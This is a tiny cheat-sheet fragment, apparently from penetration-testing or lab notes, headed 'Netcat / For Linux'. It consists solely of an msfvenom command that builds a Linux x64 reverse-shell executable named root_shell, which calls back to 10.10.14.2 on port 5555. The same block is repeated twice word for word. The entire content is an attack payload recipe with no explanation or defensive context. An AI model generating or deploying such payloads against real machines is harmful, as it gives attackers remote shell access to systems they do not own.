Netcat
For Linux
msfvenom --payload linux/x64/shell_reverse_tcp --platform linux --arch x64 LPORT=5555 LHOST=10.10.14.2 -f elf > root_shell
Netcat
For Linux
msfvenom --payload linux/x64/shell_reverse_tcp --platform linux --arch x64 LPORT=5555 LHOST=10.10.14.2 -f elf > root_shell